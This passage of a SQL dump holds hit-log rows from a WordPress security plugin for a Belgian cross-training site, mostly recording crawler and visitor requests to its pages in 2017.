(77651, 1500402062.437169, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77652, 1500402063.561305, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77653, 1500402064.489655, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77654, 1500402065.072392, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77655, 1500402065.491967, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77656, 1500402065.902275, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77657, 1500402066.419472, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77658, 1500402066.939720, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77659, 1500402358.853708, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77660, 1500402612.766336, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77661, 1500403563.742117, 873502953, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; heritrix/2.0.2-SNAPSHOT-20120411.000335 +http://www.expertsearch.nl +@OPERATOR_FROM@)'),
(77662, 1500403566.766632, 873502953, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; heritrix/2.0.2-SNAPSHOT-20120411.000335 +http://www.expertsearch.nl +@OPERATOR_FROM@)'),
(77663, 1500404415.853599, 1427857479, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1; LENNY2 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36'),
(77664, 1500404602.034152, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/41.0.2272.118 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77665, 1500406154.830821, 1532381390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 4.4.2; HUAWEI Y625-U51 Build/HUAWEIY625-U51) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/104.0.0.17.71;]'),
(77666, 1500407884.721999, 3024883471, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(77667, 1500416154.206548, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77668, 1500418686.192169, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77669, 1500420623.016181, 1538592859, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77670, 1500420625.168364, 1538592859, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77671, 1500420632.006100, 1538592859, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77672, 1500421598.018440, 2916154802, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_55_08) AppleWebKit/534.03.66 (KHTML, like Gecko) Chrome/53.6.1594.7867 Safari/530.74 Edge/34.70457'),
(77673, 1500421601.687612, 2916154802, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_55_08) AppleWebKit/534.03.66 (KHTML, like Gecko) Chrome/53.6.1594.7867 Safari/530.74 Edge/34.70457'),
(77674, 1500421955.089649, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77675, 1500425058.625661, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(77676, 1500425059.909682, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(77677, 1500427023.245283, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77678, 1500435517.702426, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77679, 1500435655.363157, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/2015/05/upl.php', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(77680, 1500439195.426018, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77681, 1500439196.050976, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77682, 1500445990.105411, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77683, 1500448654.708693, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77684, 1500451973.712725, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77685, 1500453595.820375, 2513063484, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77686, 1500456880.584021, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77687, 1500456886.048426, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77688, 1500456891.020802, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77689, 1500456901.243059, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77690, 1500456966.974796, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77691, 1500456969.009041, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77692, 1500456980.670253, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77693, 1500456989.433323, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77694, 1500456995.886013, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77695, 1500464580.381325, 1806133391, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 OPR/45.0.2552.898'),
(77696, 1500464672.324941, 1806133391, 0, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 OPR/45.0.2552.898'),
(77697, 1500464706.860853, 1806133391, 0, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 OPR/45.0.2552.898'),
(77698, 1500464713.161778, 3250520646, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77699, 1500464968.019461, 3250520646, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77700, 1500464969.638691, 3250520646, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77701, 1500464973.039957, 3250520646, 1, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'http://www2.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77702, 1500464973.863586, 3250520646, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77703, 1500465017.909961, 3250520646, 1, 0, 0, 1, 0, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77704, 1500465020.530361, 3250520646, 1, 0, 0, 1, 0, 'http://www2.crosstrainingcenter.be/en-images/', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77705, 1500465025.491708, 3250520646, 1, 0, 0, 1, 0, 'http://www2.crosstrainingcenter.be/le-cross-training/', 'http://www2.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77706, 1500465102.891914, 3250520646, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77707, 1500465104.042593, 3250520646, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77708, 1502909673.960181, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77709, 1502909674.457926, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77710, 1502909790.806650, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77711, 1502909802.817161, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77712, 1502909817.442531, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77713, 1502909833.151287, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77714, 1502909850.486816, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(77715, 1502909882.697431, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77716, 1502909915.904820, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77717, 1502909950.136022, 1123634998, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77718, 1502910056.370955, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77719, 1502910056.874045, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77720, 1502910104.022020, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77721, 1502910145.228369, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77722, 1502910188.710474, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77723, 1502910233.094946, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77724, 1502910284.138428, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77725, 1502910362.929237, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77726, 1502910475.614400, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77727, 1502910550.566742, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77728, 1502910624.535335, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77729, 1502910654.889144, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77730, 1502959341.176823, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77731, 1502991364.996616, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77732, 1502991388.149482, 1123635001, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77733, 1502991415.465035, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77734, 1502991443.711801, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77735, 1502991500.676615, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77736, 1502991529.350823, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77737, 1502991559.595887, 1123634992, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77738, 1502991662.681691, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77739, 1502991671.983721, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77740, 1502991694.832042, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77741, 1502991698.413231, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77742, 1502991896.479540, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77743, 1502991976.014077, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77744, 1502992071.026754, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77745, 1502992163.826220, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77746, 1502992291.461338, 1123634992, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77747, 1503218546.281853, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77748, 1503218546.836537, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77749, 1503242820.074871, 1405730122, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'http://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwiHm5vfjubVAhWJaVAKHd4jDMYQFghiMAg&url=http%3A%2F%2Fwww2.crosstrainingcenter.be%2Fnotre-philosophie%2F&usg=AFQjCNFsXgdWmiobox-J4gR6JVnbiMecMA', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(77750, 1503242822.369897, 1405730122, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(77751, 1503477752.520952, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77752, 1503477753.047317, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77753, 1503736958.457651, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77754, 1503736958.943551, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77755, 1503930603.264048, 3475901888, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77756, 1503930619.459908, 676177847, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77757, 1503996164.802314, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77758, 1503996165.330051, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77759, 1504225602.229057, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77760, 1504225602.798506, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77761, 1504227740.880117, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77762, 1504255369.262933, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77763, 1504287269.901332, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77764, 1504514574.313328, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77765, 1504514574.773617, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77766, 1504557600.689318, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77767, 1504572784.941731, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77768, 1505539327.615205, 2637637398, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
